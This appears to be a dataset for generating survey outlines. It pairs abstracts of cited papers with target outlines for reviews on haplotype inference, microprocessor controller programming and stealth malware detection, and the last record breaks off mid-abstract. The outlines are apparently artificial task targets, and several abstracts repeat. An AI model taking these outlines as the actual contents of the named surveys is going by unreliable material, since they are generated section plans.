of the size of current biological interest. In this paper, we show how to formulate the Pure-parsimony problem as an integer linear program; we explain how to improve the practicality of the integer programming formulation; and we present the results of extensive experimentation we have done to show the time and memory practicality of the method, and to compare its accuracy against solutions found by the widely used general haplotyping program PHASE. We also formulate and experiment with variations of the Pure-Parsimony criteria, that allow greater practicality. The results are that the Pure Parsimony problem can be solved efficiently in practice for a wide range of problem instances of current interest in biology. Both the time needed for a solution, and the accuracy of the solution, depend on the level of recombination in the input strings. The speed of the solution improves with increasing recombination, but the accuracy of the solution decreases with increasing recombination. --- paper_title: A New Integer Programming Formulation for the Pure Parsimony Problem in Haplotype Analysis paper_content: We present a new integer programming formulation for the haplotype inference by pure parsimony (HIPP) problem. Unlike a previous approach to this problem [2], we create an integer program whose size is polynomial in the size of the input. This IP is substantially smaller for moderate-sized instances of the HIPP problem. We also show several additional constraints, based on the input, that can be added to the IP to aid in finding a solution, and show how to find which of these constraints is active for a given instance in efficient time. We present experimental results that show our IP has comparable success to the formulation of Gusfield [2] on moderate-sized problems, though it is is much slower. However, our formulation can sometimes solve substantially larger problems than are practical with Gusfield’s formulation. --- paper_title: A survey of computational methods for determining haplotypes paper_content: It is widely anticipated that the study of variation in the human genome will provide a means of predicting risk of a variety of complex diseases. Single nucleotide polymorphisms (SNPs) are the most common form of genomic variation. Haplotypes have been suggested as one means for reducing the complexity of studying SNPs. In this paper we review some of the computational approaches that have been taking for determining haplotypes and suggest new approaches. --- paper_title: Integer programming approaches to haplotype inference by pure parsimony paper_content: In 2003, Gusfield introduced the Haplotype Inference by Pure Parsimony (HIPP) problem and presented an integer program (IP) that quickly solved many simulated instances of the problem [1]. Although it solved well on small instances, Gusfield's IP can be of exponential size in the worst case. Several authors [2], [3] have presented polynomial-sized IPs for the problem. In this paper, we further the work on IP approaches to HIPP. We extend the existing polynomial-sized IPs by introducing several classes of valid cuts for the IP. We also present a new polynomial-sized IP formulation that is a hybrid between two existing IP formulations and inherits many of the strengths of both. Many problems that are too complex for the exponential-sized formulations can still be solved in our new formulation in a reasonable amount of time. We provide a detailed empirical comparison of these IP formulations on both simulated and real genotype sequences. Our formulation can also be extended in a variety of ways to allow errors in the input or model the structure of the population under consideration. --- paper_title: Boosting Haplotype Inference with Local Search paper_content: A very challenging problem in the genetics domain is to infer haplotypes from genotypes. This process is expected to identify genes affecting health, disease and response to drugs. One of the approaches to haplotype inference aims to minimise the number of different haplotypes used, and is known as haplotype inference by pure parsimony (HIPP). The HIPP problem is computationally difficult, being NP-hard. Recently, a SAT-based method (SHIPs) has been proposed to solve the HIPP problem. This method iteratively considers an increasing number of haplotypes, starting from an initial lower bound. Hence, one important aspect of SHIPs is the lower bounding procedure, which reduces the number of iterations of the basic algorithm, and also indirectly simplifies the resulting SAT model. This paper describes the use of local search to improve existing lower bounding procedures. The new lower bounding procedure is guaranteed to be as tight as the existing procedures. In practice the new procedure is in most cases considerably tighter, allowing significant improvement of performance on challenging problem instances. --- paper_title: Efficient haplotype inference with boolean satisfiability paper_content: Mutation in DNA is the principal cause for differences among human beings, and Single Nucleotide Polymorphisms (SNPs) are the most common mutations. Hence, a fundamental task is to complete a map of haplotypes (which identify SNPs) in the human population. Associated with this effort, a key computational problem is the inference of haplotype data from genotype data, since in practice genotype data rather than haplotype data is usually obtained. Different haplotype inference approaches have been proposed, including the utilization of statistical methods and the utilization of the pure parsimony criterion. The problem of haplotype inference by pure parsimony (HIPP) is interesting not only because of its application to haplotype inference, but also because it is a challenging NP-hard problem, being APX-hard. Recent work has shown that a SAT-based approach is the most efficient approach for the problem of haplotype inference by pure parsimony (HIPP), being several orders of magnitude faster than existing integer linear programming and branch and bound solutions. This paper provides a detailed description of SHIPs, a SAT-based approach for the HIPP problem, and presents comprehensive experimental results comparing SHIPs with all other exact approaches for the HIPP problem. These results confirm that SHIPs is currently the most effective approach for the HIPP problem. --- paper_title: Haplotype inference from unphased SNP data in heterozygous polyploids based on SAT paper_content: BackgroundHaplotype inference based on unphased SNP markers is an important task in population genetics. Although there are different approaches to the inference of haplotypes in diploid species, the existing software is not suitable for inferring haplotypes from unphased SNP data in polyploid species, such as the cultivated potato (Solanum tuberosum). Potato species are tetraploid and highly heterozygous.ResultsHere we present the software SATlotyper which is able to handle polyploid and polyallelic data. SATlo-typer uses the Boolean satisfiability problem to formulate Haplotype Inference by Pure Parsimony. The software excludes existing haplotype inferences, thus allowing for calculation of alternative inferences. As it is not known which of the multiple haplotype inferences are best supported by the given unphased data set, we use a bootstrapping procedure that allows for scoring of alternative inferences. Finally, by means of the bootstrapping scores, it is possible to optimise the phased genotypes belonging to a given haplotype inference. The program is evaluated with simulated and experimental SNP data generated for heterozygous tetraploid populations of potato. We show that, instead of taking the first haplotype inference reported by the program, we can significantly improve the quality of the final result by applying additional methods that include scoring of the alternative haplotype inferences and genotype optimisation. For a sub-population of nineteen individuals, the predicted results computed by SATlotyper were directly compared with results obtained by experimental haplotype inference via sequencing of cloned amplicons. Prediction and experiment gave similar results regarding the inferred haplotypes and phased genotypes.ConclusionOur results suggest that Haplotype Inference by Pure Parsimony can be solved efficiently by the SAT approach, even for data sets of unphased SNP from heterozygous polyploids. SATlotyper is freeware and is distributed as a Java JAR file. The software can be downloaded from the webpage of the GABI Primary Database at http://www.gabipd.org/projects/satlotyper/. The application of SATlotyper will provide haplotype information, which can be used in haplotype association mapping studies of polyploid plants. --- paper_title: Efficient Haplotype Inference with Combined CP and OR Techniques paper_content: Haplotype inference has relevant biological applications, and represents a challenging computational problem. Among others, pure parsimony provides a viable modeling approach for haplotype inference and provides a simple optimization criterion. Alternative approaches have been proposed for haplotype inference by pure parsimony (HIPP), including branch and bound, integer programming and, more recently, propositional satisfiability and pseudo-Boolean optimization (PBO). Among these, the currently best performing HIPP approach is based on PBO. This paper proposes a number of effective improvements to PBO-based HIPP, including the use of lower bounding and pruning techniques effective with other approaches. The new PBO-based HIPP approach reduces by 50% the number of instances that remain unsolvable by HIPP based approaches. --- paper_title: Towards robust CNF encodings of cardinality constraints paper_content: Motivated by the performance improvements made to SAT solvers in recent years, a number of different encodings of constraints into SAT have been proposed. Concrete examples are the different SAT encodings for ≤ 1 (x1, . . . , xn) constraints. The most widely used encoding is known as the pairwise encoding, which is quadratic in the number of variables in the constraint. Alternative encodings are in general linear, and require using additional auxiliary variables. In most settings, the pairwise encoding performs acceptably well, but can require unacceptably large Boolean formulas. In contrast, linear encodings yield much smaller Boolean formulas, but in practice SAT solvers often perform unpredictably. This lack of predictability is mostly due to the large number of auxiliary variables that need to be added to the resulting Boolean formula. This paper studies one specific encoding for ≤ 1 (x1, . . . , xn) constraints, and shows how a state-of-the-art SAT solver can be adapted to overcome the problem of adding additional auxiliary variables. Moreover, the paper shows that a SAT solver may essentially ignore the existence of auxiliary variables. Experimental results indicate that the modified SAT solver becomes significantly more robust on SAT encodings involving ≤ 1 (x1, . . . , xn) constraints. --- paper_title: Efficient Haplotype Inference with Answer Set Programming paper_content: Identifying maternal and paternal inheritance is essential to be able to find the set of genes responsible for a particular disease. However, due to technological limitations, we have access to genotype data (genetic makeup of an individual), and determining haplotypes (genetic makeup of the parents) experimentally is a costly and time consuming procedure. With these biological motivations, we study a computational problem, called Haplotype Inference by Pure Parsimony (HIPP), that asks for the minimal number of haplotypes that form a given set of genotypes. HIPP has been studied using integer linear programming, branch and bound algorithms, SAT-based algorithms, or pseudo-boolean optimization methods. We introduce a new approach to solving HIPP, using Answer Set Programming (ASP). According to our experiments with a large number of problem instances (some automatically generated and some real), our ASP-based approach solves the most number of problems compared with other approaches. Due to the expressivity of the knowledge representation language of ASP, our approach allows us to solve variations of HIPP, e.g., with additional domain specific information, such as patterns/parts of haplotypes observed for some gene family, or with some missing genotype information. In this sense, the ASP-based approach is more general than the existing approaches to haplotype inference. --- paper_title: Efficient haplotype inference with pseudo-Boolean optimization paper_content: Haplotype inference from genotype data is a key computational problem in bioinformatics, since retrieving directly haplotype information from DNA samples is not feasible using existing technology. One of the methods for solving this problem uses the pure parsimony criterion, an approach known as Haplotype Inference by Pure Parsimony (HIPP). Initial work in this area was based on a number of different Integer Linear Programming (ILP) models and branch and bound algorithms. Recent work has shown that the utilization of a Boolean Satisfiability (SAT) formulation and state of the art SAT solvers represents the most efficient approach for solving the HIPP problem. ::: ::: Motivated by the promising results obtained using SAT techniques, this paper investigates the utilization of modern Pseudo-Boolean Optimization (PBO) algorithms for solving the HIPP problem. The paper starts by applying PBO to existing ILP models. The results are promising, and motivate the development of a new PBO model (RPoly) for the HIPP problem, which has a compact representation and eliminates key symmetries. Experimental results indicate that RPoly outperforms the SAT-based approach on most problem instances, being, in general, significantly more efficient. --- paper_title: Efficient haplotype inference with boolean satisfiability paper_content: Mutation in DNA is the principal cause for differences among human beings, and Single Nucleotide Polymorphisms (SNPs) are the most common mutations. Hence, a fundamental task is to complete a map of haplotypes (which identify SNPs) in the human population. Associated with this effort, a key computational problem is the inference of haplotype data from genotype data, since in practice genotype data rather than haplotype data is usually obtained. Different haplotype inference approaches have been proposed, including the utilization of statistical methods and the utilization of the pure parsimony criterion. The problem of haplotype inference by pure parsimony (HIPP) is interesting not only because of its application to haplotype inference, but also because it is a challenging NP-hard problem, being APX-hard. Recent work has shown that a SAT-based approach is the most efficient approach for the problem of haplotype inference by pure parsimony (HIPP), being several orders of magnitude faster than existing integer linear programming and branch and bound solutions. This paper provides a detailed description of SHIPs, a SAT-based approach for the HIPP problem, and presents comprehensive experimental results comparing SHIPs with all other exact approaches for the HIPP problem. These results confirm that SHIPs is currently the most effective approach for the HIPP problem. --- paper_title: Integer programming approaches to haplotype inference by pure parsimony paper_content: In 2003, Gusfield introduced the Haplotype Inference by Pure Parsimony (HIPP) problem and presented an integer program (IP) that quickly solved many simulated instances of the problem [1]. Although it solved well on small instances, Gusfield's IP can be of exponential size in the worst case. Several authors [2], [3] have presented polynomial-sized IPs for the problem. In this paper, we further the work on IP approaches to HIPP. We extend the existing polynomial-sized IPs by introducing several classes of valid cuts for the IP. We also present a new polynomial-sized IP formulation that is a hybrid between two existing IP formulations and inherits many of the strengths of both. Many problems that are too complex for the exponential-sized formulations can still be solved in our new formulation in a reasonable amount of time. We provide a detailed empirical comparison of these IP formulations on both simulated and real genotype sequences. Our formulation can also be extended in a variety of ways to allow errors in the input or model the structure of the population under consideration. --- paper_title: Efficient Haplotype Inference with Combined CP and OR Techniques paper_content: Haplotype inference has relevant biological applications, and represents a challenging computational problem. Among others, pure parsimony provides a viable modeling approach for haplotype inference and provides a simple optimization criterion. Alternative approaches have been proposed for haplotype inference by pure parsimony (HIPP), including branch and bound, integer programming and, more recently, propositional satisfiability and pseudo-Boolean optimization (PBO). Among these, the currently best performing HIPP approach is based on PBO. This paper proposes a number of effective improvements to PBO-based HIPP, including the use of lower bounding and pruning techniques effective with other approaches. The new PBO-based HIPP approach reduces by 50% the number of instances that remain unsolvable by HIPP based approaches. --- paper_title: Efficient haplotype inference with pseudo-Boolean optimization paper_content: Haplotype inference from genotype data is a key computational problem in bioinformatics, since retrieving directly haplotype information from DNA samples is not feasible using existing technology. One of the methods for solving this problem uses the pure parsimony criterion, an approach known as Haplotype Inference by Pure Parsimony (HIPP). Initial work in this area was based on a number of different Integer Linear Programming (ILP) models and branch and bound algorithms. Recent work has shown that the utilization of a Boolean Satisfiability (SAT) formulation and state of the art SAT solvers represents the most efficient approach for solving the HIPP problem. ::: ::: Motivated by the promising results obtained using SAT techniques, this paper investigates the utilization of modern Pseudo-Boolean Optimization (PBO) algorithms for solving the HIPP problem. The paper starts by applying PBO to existing ILP models. The results are promising, and motivate the development of a new PBO model (RPoly) for the HIPP problem, which has a compact representation and eliminates key symmetries. Experimental results indicate that RPoly outperforms the SAT-based approach on most problem instances, being, in general, significantly more efficient. --- paper_title: A New Integer Programming Formulation for the Pure Parsimony Problem in Haplotype Analysis paper_content: We present a new integer programming formulation for the haplotype inference by pure parsimony (HIPP) problem. Unlike a previous approach to this problem [2], we create an integer program whose size is polynomial in the size of the input. This IP is substantially smaller for moderate-sized instances of the HIPP problem. We also show several additional constraints, based on the input, that can be added to the IP to aid in finding a solution, and show how to find which of these constraints is active for a given instance in efficient time. We present experimental results that show our IP has comparable success to the formulation of Gusfield [2] on moderate-sized problems, though it is is much slower. However, our formulation can sometimes solve substantially larger problems than are practical with Gusfield’s formulation. --- paper_title: Efficient Haplotype Inference with Combined CP and OR Techniques paper_content: Haplotype inference has relevant biological applications, and represents a challenging computational problem. Among others, pure parsimony provides a viable modeling approach for haplotype inference and provides a simple optimization criterion. Alternative approaches have been proposed for haplotype inference by pure parsimony (HIPP), including branch and bound, integer programming and, more recently, propositional satisfiability and pseudo-Boolean optimization (PBO). Among these, the currently best performing HIPP approach is based on PBO. This paper proposes a number of effective improvements to PBO-based HIPP, including the use of lower bounding and pruning techniques effective with other approaches. The new PBO-based HIPP approach reduces by 50% the number of instances that remain unsolvable by HIPP based approaches. --- paper_title: Efficient and Tight Upper Bounds for Haplotype Inference by Pure Parsimony using Delayed Haplotype Selection paper_content: Haplotype inference from genotype data is a key step towards a better understanding of the role played by genetic variations on inherited diseases. One of the most promising approaches uses the pure parsimony criterion. This approach is called Haplotype Inference by Pure Parsimony (HIPP) and is NP-hard as it aims at minimising the number of haplotypes required to explain a given set of genotypes. The HIPP problem is often solved using constraint satisfaction techniques, for which the upper bound on the number of required haplotypes is a key issue. Another very well-known approach is Clark's method, which resolves genotypes by greedily selecting an explaining pair of haplotypes. In this work, we combine the basic idea of Clark's method with a more sophisticated method for the selection of explaining haplotypes, in order to explicitly introduce a bias towards parsimonious explanations. This new algorithm can be used either to obtain an approximated solution to the HIPP problem or to obtain an upper bound on the size of the pure parsimony solution. This upper bound can then used to efficiently encode the problem as a constraint satisfaction problem. The experimental evaluation, conducted using a large set of real and artificially generated examples, shows that the new method is much more effective than Clark's method at obtaining parsimonious solutions, while keeping the advantages of simplicity and speed of Clark's method. --- paper_title: A New Integer Programming Formulation for the Pure Parsimony Problem in Haplotype Analysis paper_content: We present a new integer programming formulation for the haplotype inference by pure parsimony (HIPP) problem. Unlike a previous approach to this problem [2], we create an integer program whose size is polynomial in the size of the input. This IP is substantially smaller for moderate-sized instances of the HIPP problem. We also show several additional constraints, based on the input, that can be added to the IP to aid in finding a solution, and show how to find which of these constraints is active for a given instance in efficient time. We present experimental results that show our IP has comparable success to the formulation of Gusfield [2] on moderate-sized problems, though it is is much slower. However, our formulation can sometimes solve substantially larger problems than are practical with Gusfield’s formulation. --- paper_title: Integer programming approaches to haplotype inference by pure parsimony paper_content: In 2003, Gusfield introduced the Haplotype Inference by Pure Parsimony (HIPP) problem and presented an integer program (IP) that quickly solved many simulated instances of the problem [1]. Although it solved well on small instances, Gusfield's IP can be of exponential size in the worst case. Several authors [2], [3] have presented polynomial-sized IPs for the problem. In this paper, we further the work on IP approaches to HIPP. We extend the existing polynomial-sized IPs by introducing several classes of valid cuts for the IP. We also present a new polynomial-sized IP formulation that is a hybrid between two existing IP formulations and inherits many of the strengths of both. Many problems that are too complex for the exponential-sized formulations can still be solved in our new formulation in a reasonable amount of time. We provide a detailed empirical comparison of these IP formulations on both simulated and real genotype sequences. Our formulation can also be extended in a variety of ways to allow errors in the input or model the structure of the population under consideration. --- paper_title: Haplotype inference by pure Parsimony paper_content: The next high-priority phase of human genomics will involve the development and use of a full Haplotype Map of the human genome [7]. A critical, perhaps dominating, problem in all such efforts is the inference of large-scale SNP-haplotypes from raw genotype SNP data. This is called the Haplotype Inference (HI) problem. Abstractly, input to the HI problem is a set of n strings over a ternary alphabet. A solution is a set of at most 2n strings over the binary alphabet, so that each input string can be "generated" by some pair of the binary strings in the solution. For greatest biological fidelity, a solution should be consistent with, or evaluated by, properties derived from an appropriate genetic model. ::: ::: A natural model, that has been suggested repeatedly is called here the Pure Parsimony model, where the goal is to find a smallest set of binary strings that can generate the n input strings. The problem of finding such a smallest set is called the Pure Parsimony Problem. Unfortunately, the Pure Parsimony problem is NP-hard, and no paper has previously shown how an optimal Pure-parsimony solution can be computed efficiently for problem instances of the size of current biological interest. In this paper, we show how to formulate the Pure-parsimony problem as an integer linear program; we explain how to improve the practicality of the integer programming formulation; and we present the results of extensive experimentation we have done to show the time and memory practicality of the method, and to compare its accuracy against solutions found by the widely used general haplotyping program PHASE. We also formulate and experiment with variations of the Pure-Parsimony criteria, that allow greater practicality. The results are that the Pure Parsimony problem can be solved efficiently in practice for a wide range of problem instances of current interest in biology. Both the time needed for a solution, and the accuracy of the solution, depend on the level of recombination in the input strings. The speed of the solution improves with increasing recombination, but the accuracy of the solution decreases with increasing recombination. --- paper_title: Efficient Haplotype Inference with Combined CP and OR Techniques paper_content: Haplotype inference has relevant biological applications, and represents a challenging computational problem. Among others, pure parsimony provides a viable modeling approach for haplotype inference and provides a simple optimization criterion. Alternative approaches have been proposed for haplotype inference by pure parsimony (HIPP), including branch and bound, integer programming and, more recently, propositional satisfiability and pseudo-Boolean optimization (PBO). Among these, the currently best performing HIPP approach is based on PBO. This paper proposes a number of effective improvements to PBO-based HIPP, including the use of lower bounding and pruning techniques effective with other approaches. The new PBO-based HIPP approach reduces by 50% the number of instances that remain unsolvable by HIPP based approaches. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. ---
Title: Haplotype Inference with Boolean Constraint Solving: An Overview Section 1: Introduction Description 1: This section will provide an introduction to the haplotype inference problem, its significance in human genetics, and the computational challenges associated with its solution. It will also introduce the approach using pure parsimony and highlight the paper's objectives. Section 2: Preliminaries Description 2: This section will explain the basic biological concepts and terminologies relevant to haplotype inference, such as DNA, SNPs, and genotypes, ensuring that readers have the necessary background to understand the subsequent sections. Section 3: Haplotype Inference Description 3: This section will delve into the concept of haplotypes, the challenges in directly obtaining them from genotypes, and different computational approaches used to infer haplotypes, including the use of statistical and parsimony-based methods. Section 4: Standard Techniques for Solving HIPP Description 4: This section will discuss general techniques used in preprocessing and solving the HIPP problem, emphasizing methods to simplify problem instances and improve solver performance. Section 5: Simplifying the Problem Instances Description 5: This section will describe approaches to reducing the size of haplotype inference problem instances, such as identifying and removing redundant genotypes and simplifying symmetric sites. Section 6: Computing Lower Bounds Description 6: This section will explore techniques for computing lower bounds on the number of haplotypes required to explain a given set of genotypes, focusing on incompatibility graphs and other heuristic methods. Section 7: Computing Upper Bounds Description 7: This section will explain methods for computing upper bounds using algorithms like Clark's method and Delayed Selection, providing insights into their applications and limitations. Section 8: Solving HIPP with ILP Description 8: This section will review Integer Linear Programming (ILP) models for solving the HIPP problem, detailing different ILP approaches, including exponential-size and polynomial-size models. Section 9: Solving HIPP with SAT Description 9: This section will discuss the use of Boolean Satisfiability (SAT) solvers in addressing the HIPP problem, explaining the construction of CNF formulas and the advantages of SAT-based approaches. Section 10: Solving HIPP with PBO Description 10: This section will cover the use of Pseudo-Boolean Optimization (PBO) for haplotype inference, contrasting it with other methods and highlighting key modifications and performance improvements. Section 11: Practical Experience Description 11: This section will present empirical results and practical evaluations of different models and techniques on a set of challenging problem instances, comparing their efficiency and effectiveness. Section 12: Research Directions Description 12: This section will identify potential future research areas in haplotype inference, discussing the need for improved accuracy and additional criteria for selecting the most appropriate solutions.
A Review Paper on Microprocessor Based Controller Programming
7
--- paper_title: A Quasi-Delay-Insensitive Microprocessor Core Implementation for Microcontrollers paper_content: Microcontrollers are widely used on simple systems; thus, how to keep them operating with high robustness and low power consumption are the two most important issues. It is widely known that asynchronous circuit is the best solution to address these two issues at the same time. However, it’s not very easy to realize asynchronous circuit and certainly very hard to model processors with asynchronous pipeline. That's why most processors are implemented with synchronous circuit. There are several ways to model asynchronous pipeline. The most famous of all is the micropipeline; in addition, most micropipeline based asynchronous systems are implemented with single-rail bundleddelay model. However, we implemented our 8-bit microprocessor core for asynchronous microcontrollers with an alternative – the Muller pipeline. We implemented our microprocessor core with dual-rail quasi-delay-insensitive model with Verilog gate-level design. The instruction set for the target microprocessor core is compatible with PIC18. The correctness was verified with ModelSim software, and the gate-level design was synthesized into Altera Cyclone FPGA. In fact, the model we used in this paper can be applied to implement other simple microprocessor core without much difficulty. --- paper_title: A novel asynchronous pipeline architecture for CISC type embedded controller, A8051 paper_content: Asynchronous design methods are known to have higher performance in power consumption and execution speed than synchronous ones because they just needs to activate the required module without feeding clock and power to the entire system. In this paper, we propose an asynchronous processor, A8051, compatible with the Intel 8051, which is a challenge for a pipelined asynchronous design for a CISC type microcontroller. The A8051 has special features such as an optimal instruction execution scheme that eliminates the bubble state, variable instruction length handling and multi-looping pipeline architectures for a CISC machine. The A8051 is composed of 5 pipeline stages based on the CISC architecture. It is implemented with RTL level languages and a verified behavioral model is synthesized with a 0.35 /spl mu/m CMOS standard cell library. The results show that the A8051 exhibits about 18 times higher speed than that of the Intel 80C51 and about 5 times higher than another asynchronous 8051 design in (H. van Gageldonk et al. Proc. Int. Symp. on Advanced Research in Asynchronous Circuits and Systems, p.96-107, 1998). ---
Title: A Review Paper on Microprocessor Based Controller Programming Section 1: INTRODUCTION Description 1: Introduce the historical background, importance, and basic principles of microprocessor-based controllers, emphasizing their evolution and the advantages they offer over earlier systems. Section 2: CONTROLLER CONFIGURATION Description 2: Explain the essential elements and building blocks of microprocessor-based controllers, coupling hardware components with their functional roles. Section 3: CONTROLLER SOFTWARE Description 3: Describe the two main categories of controller software: operating software and application software, detailing their respective functions and significance in the control process. Section 4: Operating software Description 4: Detail the components and functionality of the operating software, including the operating system, task scheduling, I/O scanning, priority interrupts, and other essential tasks. Section 5: Application Software Description 5: Explore different types of application software used for various control requirements, and explain how software can be customized for specific applications such as building management and energy control. Section 6: DIRECT DIGITAL CONTROL SOFTWARE Description 6: Discuss Direct Digital Control (DDC) software, highlighting its role in executing specific control actions, including key elements and various operators used in DDC programs. Section 7: CONTROLLER PROGRAMMING Description 7: Elaborate on the different categories of controller programming, such as configuration programming, system initialization programming, data file programming, and custom control programming, along with necessary procedures and considerations. Section 8: CONCLUSION Description 8: Summarize the importance of software in defining the behavior of microprocessor-based controllers, and discuss key factors influencing programming complexity and effectiveness.
A Survey of Stealth Malware Attacks, Mitigation Measures, and Steps Toward Autonomous Open World Solutions
7
--- paper_title: A data mining framework for building intrusion detection models paper_content: There is often the need to update an installed intrusion detection system (IDS) due to new attack methods or upgraded computing environments. Since many current IDSs are constructed by manual encoding of expert knowledge, changes to IDSs are expensive and slow. We describe a data mining framework for adaptively building Intrusion Detection (ID) models. The central idea is to utilize auditing programs to extract an extensive set of features that describe each network connection or host session, and apply data mining programs to learn rules that accurately capture the behavior of intrusions and normal activities. These rules can then be used for misuse detection and anomaly detection. New detection models are incorporated into an existing IDS through a meta-learning (or co-operative learning) process, which produces a meta detection model that combines evidence from multiple models. We discuss the strengths of our data mining programs, namely, classification, meta-learning, association rules, and frequent episodes. We report on the results of applying these programs to the extensively gathered network audit data for the 1998 DARPA Intrusion Detection Evaluation Program. --- paper_title: Taxonomy and Survey of Collaborative Intrusion Detection paper_content: The dependency of our society on networked computers has become frightening: In the economy, all-digital networks have turned from facilitators to drivers; as cyber-physical systems are coming of age, computer networks are now becoming the central nervous systems of our physical world—even of highly critical infrastructures such as the power grid. At the same time, the 24s7 availability and correct functioning of networked computers has become much more threatened: The number of sophisticated and highly tailored attacks on IT systems has significantly increased. Intrusion Detection Systems (IDSs) are a key component of the corresponding defense measures; they have been extensively studied and utilized in the past. Since conventional IDSs are not scalable to big company networks and beyond, nor to massively parallel attacks, Collaborative IDSs (CIDSs) have emerged. They consist of several monitoring components that collect and exchange data. Depending on the specific CIDS architecture, central or distributed analysis components mine the gathered data to identify attacks. Resulting alerts are correlated among multiple monitors in order to create a holistic view of the network monitored. This article first determines relevant requirements for CIDSs; it then differentiates distinct building blocks as a basis for introducing a CIDS design space and for discussing it with respect to requirements. Based on this design space, attacks that evade CIDSs and attacks on the availability of the CIDSs themselves are discussed. The entire framework of requirements, building blocks, and attacks as introduced is then used for a comprehensive analysis of the state of the art in collaborative intrusion detection, including a detailed survey and comparison of specific CIDS approaches. --- paper_title: Intrusion detection and Big Heterogeneous Data: a Survey paper_content: Intrusion Detection has been heavily studied in both industry and academia, but cybersecurity analysts still desire much more alert accuracy and overall threat analysis in order to secure their systems within cyberspace. Improvements to Intrusion Detection could be achieved by embracing a more comprehensive approach in monitoring security events from many different heterogeneous sources. Correlating security events from heterogeneous sources can grant a more holistic view and greater situational awareness of cyber threats. One problem with this approach is that currently, even a single event source (e.g., network traffic) can experience Big Data challenges when considered alone. Attempts to use more heterogeneous data sources pose an even greater Big Data challenge. Big Data technologies for Intrusion Detection can help solve these Big Heterogeneous Data challenges. In this paper, we review the scope of works considering the problem of heterogeneous data and in particular Big Heterogeneous Data. We discuss the specific issues of Data Fusion, Heterogeneous Intrusion Detection Architectures, and Security Information and Event Management (SIEM) systems, as well as presenting areas where more research opportunities exist. Overall, both cyber threat analysis and cyber intelligence could be enhanced by correlating security events across many diverse heterogeneous sources. --- paper_title: Intrusion detection systems: A survey and taxonomy paper_content: This paper presents a taxonomy of intrusion detection systems that is then used to survey and classify a number of research prototypes. The taxonomy consists of a classification first of the detection principle, and second of certain operational aspects of the intrusion detection system as such. The systems are also grouped according to the increasing difficulty of the problem they attempt to address. These classifications are used predictively, pointing towards a number of areas of future research in the field of intrusion detection. --- paper_title: Anomaly-based network intrusion detection: Techniques, systems and challenges paper_content: The Internet and computer networks are exposed to an increasing number of security threats. With new types of attacks appearing continually, developing flexible and adaptive security oriented approaches is a severe challenge. In this context, anomaly-based network intrusion detection techniques are a valuable technology to protect target systems and networks against malicious activities. However, despite the variety of such methods described in the literature in recent years, security tools incorporating anomaly detection functionalities are just starting to appear, and several important problems remain to be solved. This paper begins with a review of the most well-known anomaly-based intrusion detection techniques. Then, available platforms, systems under development and research projects in the area are presented. Finally, we outline the main challenges to be dealt with for the wide scale deployment of anomaly-based intrusion detectors, with special emphasis on assessment issues. --- paper_title: Android Security: A Survey of Issues, Malware Penetration, and Defenses paper_content: Smartphones have become pervasive due to the availability of office applications, Internet, games, vehicle guidance using location-based services apart from conventional services such as voice calls, SMSes, and multimedia services. Android devices have gained huge market share due to the open architecture of Android and the popularity of its application programming interface (APIs) in the developer community. Increased popularity of the Android devices and associated monetary benefits attracted the malware developers, resulting in big rise of the Android malware apps between 2010 and 2014. Academic researchers and commercial antimalware companies have realized that the conventional signature-based and static analysis methods are vulnerable. In particular, the prevalent stealth techniques, such as encryption, code transformation, and environment-aware approaches, are capable of generating variants of known malware. This has led to the use of behavior-, anomaly-, and dynamic-analysis-based methods. Since a single approach may be ineffective against the advanced techniques, multiple complementary approaches can be used in tandem for effective malware detection. The existing reviews extensively cover the smartphone OS security. However, we believe that the security of Android, with particular focus on malware growth, study of antianalysis techniques, and existing detection methodologies, needs an extensive coverage. In this survey, we discuss the Android security enforcement mechanisms, threats to the existing security enforcements and related issues, malware growth timeline between 2010 and 2014, and stealth techniques employed by the malware authors, in addition to the existing detection methods. This review gives an insight into the strengths and shortcomings of the known research methodologies and provides a platform, to the researchers and practitioners, toward proposing the next-generation Android security, analysis, and malware detection techniques. --- paper_title: Outside the Closed World: On Using Machine Learning for Network Intrusion Detection paper_content: In network intrusion detection research, one popular strategy for finding attacks is monitoring a network's activity for anomalies: deviations from profiles of normality previously learned from benign traffic, typically identified using tools borrowed from the machine learning community. However, despite extensive academic research one finds a striking gap in terms of actual deployments of such systems: compared with other intrusion detection approaches, machine learning is rarely employed in operational "real world" settings. We examine the differences between the network intrusion detection problem and other areas where machine learning regularly finds much more success. Our main claim is that the task of finding attacks is fundamentally different from these other applications, making it significantly harder for the intrusion detection community to employ machine learning effectively. We support this claim by identifying challenges particular to network intrusion detection, and provide a set of guidelines meant to strengthen future research on anomaly detection. --- paper_title: Review: Intrusion detection by machine learning: A review paper_content: The popularity of using Internet contains some risks of network attacks. Intrusion detection is one major research problem in network security, whose aim is to identify unusual access or attacks to secure internal networks. In literature, intrusion detection systems have been approached by various machine learning techniques. However, there is no a review paper to examine and understand the current status of using machine learning techniques to solve the intrusion detection problems. This chapter reviews 55 related studies in the period between 2000 and 2007 focusing on developing single, hybrid, and ensemble classifiers. Related studies are compared by their classifier design, datasets used, and other experimental setups. Current achievements and limitations in developing intrusion detection systems by machine learning are present and discussed. A number of future research directions are also provided. --- paper_title: Survey on Android Rootkit paper_content: Rootkit can stealthily modify the code and data of operating system to achieve malicious goals,and it has long been a problem for computers.With increasingly equipped with operating systems,smart phones are as vulnerable to many of the same threats as computers.This paper analyzed the implementation of a SMS-based kernel-level Rootkit on Android system,described the attack behaviors of it,and put forward three effective detections such as EPA. --- paper_title: Copilot - a coprocessor-based kernel runtime integrity monitor paper_content: Copilot is a coprocessor-based kernel integrity monitor for commodity systems. Copilot is designed to detect malicious modifications to a host's kernel and has correctly detected the presence of 12 real-world rootkits, each within 30 seconds of their installation with less than a 1% penalty to the host's performance. Copilot requires no modifications to the protected host's software and can be expected to operate correctly even when the host kernel is thoroughly compromised - an advantage over traditional monitors designed to run on the host itself. --- paper_title: The design and implementation of tripwire: a file system integrity checker paper_content: At the heart of most computer systems is a file system. The file system contains user data, executable programs, configuration and authorization information, and 